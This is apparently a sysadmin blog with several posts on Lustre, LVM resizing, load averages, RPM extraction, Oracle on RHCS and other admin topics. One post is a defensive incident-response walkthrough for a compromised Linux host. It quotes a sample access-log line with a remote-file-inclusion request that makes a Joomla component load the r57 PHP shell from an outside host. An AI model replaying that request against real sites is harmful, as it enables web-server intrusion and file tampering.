To Cluster with Lustre … or not?

Recently I was tasked with investigating the feasibility of using Lustre (a clustered file system typically used in supercomputing environments) for a solution at my employer. In short, the system requires a few high-end components to achieve considerable throughput. I’ll attempt to outline the pros and cons of using Lustre in a production environment.

Lustre is a cluster-aware file system originally designed by Cluster File Systems, Inc., which was recently acquired by Sun Microsystems. Lustre was designed to be a highly scalable, high-performance file system/cluster solution. The system consists of a few key components at its core.

Picking a clustered file system such as Lustre has to be driven by need. These systems are inherently more complex and, for that reason, can be more prone to failure. Lustre makes sense if you’re looking for a scalable, high-performance storage solution that can expand across thousands of storage nodes. Most business problems do not need a solution of this magnitude. Now would be a good time to cover the terminology used with Lustre.

Terminology

Lustre has some key terms we’ll need to know while reading this short paper.

  • MGS – Management Server (there is one management server per site; it contains all configuration details for every Lustre cluster at that site)
  • MDT – Metadata Target (this server [or pair of servers] stores all the metadata describing where files are stored)
  • OST – Object Storage Target (this is where the data is actually stored and striped across)
  • Lustre Clients (these clients are typically *nix variants)

Now that we have the terminology out of the way I’ll describe how it works (just a high-level overview).

We’ve reviewed the components of the Lustre configuration above. The MGS stores all configuration data needed for a site. The MDT stores the metadata describing where files are located (pointers to OSTs), and the OSTs provide the physical storage for the objects (files) themselves.
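To make those roles a bit more concrete, here is a minimal sketch of standing up each piece with the standard mkfs.lustre/mount tooling. The hostname (mgs01), file system name (testfs) and device names are made up, and exact options vary between Lustre releases, so treat this as illustrative rather than a build recipe:

# mkfs.lustre --mgs /dev/sdb                                         # on the management server
# mkfs.lustre --fsname=testfs --mdt --mgsnode=mgs01@tcp0 /dev/sdc    # on the metadata server
# mkfs.lustre --fsname=testfs --ost --mgsnode=mgs01@tcp0 /dev/sdd    # on each object storage server
# mount -t lustre mgs01@tcp0:/testfs /mnt/lustre                     # on a client

Each formatted target is also mounted locally (mount -t lustre <device> <mountpoint>) on its own server to bring it online before clients mount the file system.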

The key benefits are scalability and performance. Performance is achieved by striping data across all available OSTs; this is what makes Lustre shine. Consequently, you’ll need equipment to support that level of speed.
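Striping itself is controlled from the client side with the lfs utility. A quick sketch (the directory path is just an example, and option spellings vary a little between Lustre releases):

# lfs setstripe -c -1 /mnt/lustre/bigdata      # stripe new files in this directory across all available OSTs
# lfs getstripe /mnt/lustre/bigdata/somefile   # show which OSTs a given file actually landed on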

Lustre uses its own network drivers to facilitate network communication between nodes. Currently Lustre supports TCP/IP, Quadrics Elan, InfiniBand, Myrinet and others.

Equipment

Here is where most decisions are made. Lustre on a 1Gb network can perform reasonably well (provided your switching backplane is up to it), but it also depends on how many clients are accessing this array of machines. A higher-speed interconnect such as 10Gb Ethernet or InfiniBand is recommended.

The bottom line

The bottom line is simple: if you need a system that is highly scalable, high-performance and very reliable, pick Lustre. Remember that to gain any considerable speed you will need a considerable investment in the network arena. Lustre is not widely deployed in most hosting enterprises, but it could serve as a good storage back end for a cluster of web servers, since Lustre supports reading and writing the same file at the same time from different machines.


Tracking down h4X0rZ

This is a quick and dirty document on how to troubleshoot h4xed l00nix boxen.

The scenario is as follows:
We received reports from outside ISPs of an attempted DDoS attack, coming from one of our machines, against an IP address in their netblock. On closer investigation this machine had a few rogue processes, noticed by issuing “ps auxww”. The processes were listed as “/usr/sbin/httpd”, which was not the path of the real httpd binary on that system; the ps name was forged. After catting “/proc/<pid>/status” I could see that the process running was actually perl. Luckily this particular attack was not a root-level compromise. If you suspect a root-level hack, please download a utility like rkhunter to perform a quick and easy scan of the entire system for possible rootkits. Also download statically linked binaries of ls, ps, pstree and strace if you suspect root-level hacking, since attackers usually replace these files to obfuscate their rogue processes and files.
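Two quick checks along those lines, useful for unmasking a forged process name (substitute the suspect PID; this relies only on the standard Linux /proc layout):

# ls -l /proc/<pid>/exe      # symlink to the binary that is really running, regardless of what ps shows
# head /proc/<pid>/status    # the Name: field gave away "perl" in this case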

Troubleshooting Steps:

  1. ps auxww (showing all processes)
  2. top (to analyze possible high-load processes)
  3. netstat -tupan | grep <pid> (to see if we can find out if the PID is listening)
  4. strace -p <pid> (to watch what the process is actually doing)
    socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
    ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfffb8a8) = -1 EINVAL (Invalid argument)
    _llseek(3, 0, 0xbfffb8e0, SEEK_CUR)     = -1 ESPIPE (Illegal seek)
    ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfffb8a8) = -1 EINVAL (Invalid argument)
    _llseek(3, 0, 0xbfffb8e0, SEEK_CUR)     = -1 ESPIPE (Illegal seek)
    fcntl64(3, F_SETFD, FD_CLOEXEC)         = 0
    connect(3, {sa_family=AF_INET, sin_port=htons(23), sin_addr=inet_addr("xxx.xxx.xxx.xxx")}, 16) = -1 ECONNREFUSED (Connection refused)
    close(3)
  5. Reading the output above shows the process trying to connect outbound to the address in inet_addr() on port 23, over and over again. This was apparently part of the DDoS traffic the ISPs reported; this is not your normal script.
  6. lsof -p <pid> (this might be helpful to see what files the pid has open)
  7. cat /proc/<pid>/status to see other useful information. Also check /proc/<pid>/cwd to see if the process will give away its working directory.
  8. find / -gid <gid of httpd> > /root/apachefiles.txt (I suspected the file was written out by the httpd user, so it’s somewhere on the file system)
  9. Download MemGrep

    memgrep allows you to list a process’s memory regions and view/search the contents at a given memory address.

    First download the source and build it with make. Then run memgrep as follows:

    # ./memgrep -p <pid> -L

    Then run memgrep to dump everything from the data segment (and even the text segment if necessary) with this command:

    # ./memgrep -p <pid> -d -a <memory address> -l <size in bytes to dump (listed to the right of the memory address)>

    Sometimes this will yield the hax0r’s name or the type of hack.

  10. Check your httpd logs. The most common exploits for PHP scripts are automated (watch out for Mambo and Joomla components!), and most of the requests come from an agent called libwww-perl. Joomla and Mambo components are usually subject to remote-inclusion vulnerabilities. Look for “mosConfig_absolute_path=” in your logs (see the log-hunting example after this list).

    Here’s a sample:

    xxx.xxx.xxx.xxx - - [07/Jun/2007:11:34:38 -0500] "GET /index.php?option=com_phpshop&page=shop.registration&option=com_phpshop&Itemid=61/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://alienr0x.by.ru/r57.txt? HTTP/1.1" 200 14130 "-" "libwww-perl/5.805"
  11. r57.txt is a PHP shell script. Once they load the URI above they have access to a PHP shell where they can read, write, modify and delete any file the httpd UID/GID has permission to touch.
  12. Rectify the situation by disabling that component and searching for an upgrade.
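Following up on step 10, a quick way to hunt through the Apache logs for the remote-inclusion attempts (the log path is an example; adjust for your layout):

# grep "mosConfig_absolute_path=" /var/log/httpd/access_log*
# grep -c "libwww-perl" /var/log/httpd/access_log*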

How to quiet Dell alarms

Just a quick note. To quiet an alarm on a controller just run the following command:

# omconfig storage controller action=quietalarm controller=<controller id>

Use this command to disable alarms altogether:

# omconfig storage controller action=disablealarm controller=<controller id>
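If you’re not sure of the controller ID, OpenManage should be able to list the controllers it sees (this assumes omreport is installed alongside omconfig):

# omreport storage controller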

How to extract an RPM (without installing)

Most of us are familiar with RPM packages and how to install them. Sometimes it can be useful to extract a package’s files without installing it (and without touching the RPM database). We use cpio (a utility that copies files to and from archives) and a tool called rpm2cpio.

  1. Download/obtain the RPM you wish to extract.
  2. Make a temporary directory for your RPM extraction.
  3. Run the following command: 
    rpm2cpio wget-1.9.1-22.i386.rpm | cpio -idmv
  4. Your files are now extracted (with directory structure) in your temporary directory. The cpio flags are as follows:
    i – restore archive
    d – create any leading directories if needed
    m – retain file modification times
    v – verbose mode (display progress and folder structure)
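If you only want to peek inside a package without extracting anything, swapping the extract flags for a listing also works (same example package as above):

rpm2cpio wget-1.9.1-22.i386.rpm | cpio -t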

Here’s what we see on the screen when performing the above operations:

[screenshots of the rpm2cpio extraction output]

Load Average Explanation

While working with Linux many of us have noticed the Linux "Load Average" but never really put much thought into how this number is generated. Despite the common assumption that it blends many different metrics (disk load, CPU usage, memory usage and so on), the load average is simply the average number of processes waiting in the run queue, either runnable or blocked on uninterruptible I/O such as disk, over the last 1, 5 and 15 minutes.

Using "top" provides insight into the system’s general health status.

The top command provides a view of the following main health statistics:

  • Uptime (in days, hours and minutes), plus the current time, the user count and the load averages
  • The total number of processes along with the number of running processes and sleeping processes
  • Memory usage including total memory, used and free memory
  • Swap memory usage (useful for troubleshooting slow systems)

The top command looks like this:

[screenshot of sample top output]

The topmost process on the top process list is the process using the highest percentage of CPU. The top command is available on most Unix and Linux variants.

As we’ll learn, CPU usage is not directly related to load average. Load average is an overall view of the system.

The load average rule of thumb

One quick rule of thumb I try to use (to make sure systems do not see any latency, e.g. slow processes, slow page loads, slow queries and so on) is to keep the number of waiting processes in the run queue, i.e. the load average, which represents the average number of processes that had to wait for resources over the last 1, 5 and 15 minutes, under the total number of processors in the machine.
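The current values are easy to read straight from the kernel; the numbers below are just an example:

cat /proc/loadavg
0.42 0.36 0.30 1/123 4567

The first three fields are the 1, 5 and 15 minute load averages, the fourth is running/total tasks, and the last is the most recently assigned PID.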

To check the number of processors (recognized by the Unix/Linux OS) run the following command:

cat /proc/cpuinfo | grep "processor" | wc -l

Keep in mind this command returns the total number of recognized processors. If you have a hyper-threaded P4 you’ll see two processors when you really only have one core; keep that in mind when applying the load average rule of thumb.

Keeping the load average under the total processor count will make for a happy, healthy and fast-responding system.

Good Luck!

/dev/null – Permission Denied

Strangely enough, I found a server today that had permissions set incorrectly on “/dev/null”.

Here’s a fix:

ls -l /dev/null

If everything is set correctly you should see this:

crw-rw-rw- 1 root root 1, 3

If you get a different set of permissions, maybe something like this:

-rw-r--r-- 1 root root 1, 3

then you should (as root) delete /dev/null with:

rm /dev/null

and recreate it (again as root) with:

mknod -m 0666 /dev/null c 1 3

Amazingly large null file (/var/log/lastlog)

I’ve been seeing a lot of strange size reports on some Linux machines… specifically 64-bit systems.

The reason you see a 1.2TB file full of null data is that the “nfsnobody” user is created with a UID of “-1”, which wraps around to the highest UID available. On a 32-bit system that is “65534”, but on a 64-bit system it’s a staggering “4294967294”. lastlog pre-allocates space for every UID up to the highest one it knows about, so it reserves room for roughly 4.2 billion users just to accommodate “nfsnobody”. The file doesn’t really use _that_ much space (it’s sparse), but most backup utilities (e.g. EMC Retrospect) don’t know how to handle null/sparse files and will hang almost indefinitely when they try to back up that file. Here’s the quick and dirty solution:

# usermod -u 65533 nfsnobody
# groupmod -g 65533 nfsnobody
# echo "" > /var/log/lastlog
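To see how little of that apparent size is actually allocated (and to confirm things after the fix), compare the reported file size with the blocks really in use:

# ls -lh /var/log/lastlog
# du -h /var/log/lastlog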

Happy Linuxing!

Partition Manipulation (LVM … yum.)

A while back I faced a difficult issue concerning a full partition that needed to be expanded; logical volume management was in use, but there was no extra physical disk space left to partition. Here’s what I did… The solution/information below pertains to a CentOS/Red Hat EL box, release 4 or higher. BACK UP YOUR DATA! :-)

Real World Problem:
Server "foo" has 50KB free on /home and has no additional disks to grow to. This server has all slots full and is running RAID5.

Real World Solution:
Copy the existing disk to a new, larger disk (or disk array), pop into cfdisk, create a new partition on the extra free space, grow the logical volume, and resize the file system with ext2online. Here’s a step-by-step:

  1. Use dd (or another disk-imaging tool) to copy the old disk to the new disk
  2. Boot from the new disk
  3. Download the CFDisk RPM
  4. Download ncurses-4 and ncurses-5
  5. Install the above-mentioned RPMs
    (rpm -ivh cfdisk-glibc-0.8g-1.i386.rpm; rpm --force -ivh ncurses4-5.0-12.i386.rpm; rpm --force -ivh ncurses-devel-5.4-13.i386.rpm)
  6. Run cfdisk /dev/device (probably /dev/sda or sdb .. you should know the device!)
  7. Create new partition and write changes – reboot.
  8. Create the PV (pvcreate /dev/sda6); this creates the physical volume on the new partition, sda6
  9. Add the PV to the volume group (vgextend VolGroup00 /dev/sda6)
  10. vgdisplay will show the volume group’s total and free size (see the quick check after this list); now we can extend our LV
  11. Unmount the file system being resized (in our case it was /home): umount /home
  12. lvextend -L +100G /dev/VolGroup00/LogVol00-Home (this extends the current LV by 100GB)
  13. Mount the partition back at its mount point (as specified in fstab): mount /home
  14. Use ext2online to grow the file system to its full size, yes, while it’s mounted! (ext2online /home &)
    "df -h" will show the partition growing before your eyes!
  15. Enjoy a cool beverage.
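A quick sanity check at step 10, and again after the resize, might look like this (volume and mount names as used above):

# vgdisplay VolGroup00 | grep -i free
# lvdisplay /dev/VolGroup00/LogVol00-Home
# df -h /home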

The reason for using cfdisk and not fdisk is that fdisk will not recognize the disk size change, because dd copies everything, all the partition structures included. cfdisk is the only utility (at least that I found) that can handle this type of situation.

Oracle and RHCS – Bad Idea!

A long time ago I performed an installation of an Oracle cluster. This cluster, unlike a true Oracle cluster, uses Red Hat Cluster Suite (RHCS) and involved two Dell 1950s, each with 8GB RAM and two 146GB 15K SAS drives. Each of these machines is connected to a CLARiiON SAN via QLogic FC cards through a pair of McDATA FC switches.

This cluster is more of an active/active cluster, but, unlike Oracle’s RAC clustering software, there are four instances running on one machine and four running on the other, effectively evening out the load. There are quite a few downsides to this method, which I will outline below. There are, however, a few pros as well.

Pros:

  • Allows applications not written for a RAC cluster to still be used in a clustered environment for high availability.

Cons:

  • Expensive! Both RHCS and GFS ($2,000 per node per year) were needed for this setup. This company chose to use supported versions of Linux, Cluster Suite and GFS. Of course, you can do all of this for free, as the OS, file system and cluster utilities are freely available.
  • Not truly load balanced. This setup was meant to be load balanced but they are still two separate Oracle installations on two machines. The clustering suite just allows for proper failover.
  • RHCS was never made to support Oracle running on both systems. Oracle’s Enterprise Manager will not start for two installations on the same Ethernet adapter, which is exactly the situation you hit if both installations fail over to one machine; EM is then inaccessible for the databases that failed over.
  • Lots and lots of editing was needed to make Oracle work properly: editing the startup scripts and oratab, creating more custom startup scripts, and so on. In general this was a messy install.

In summary, I would not recommend using Oracle with RHCS. I would highly recommend that the application be re-written to be “RAC compatible” so that you can fully utilize the power of Oracle’s load balancing. This will save time and money in the short run, and possibly the long run, depending on what kind of support issues you encounter. RHCS is great, but I wouldn’t recommend it to anyone for Oracle.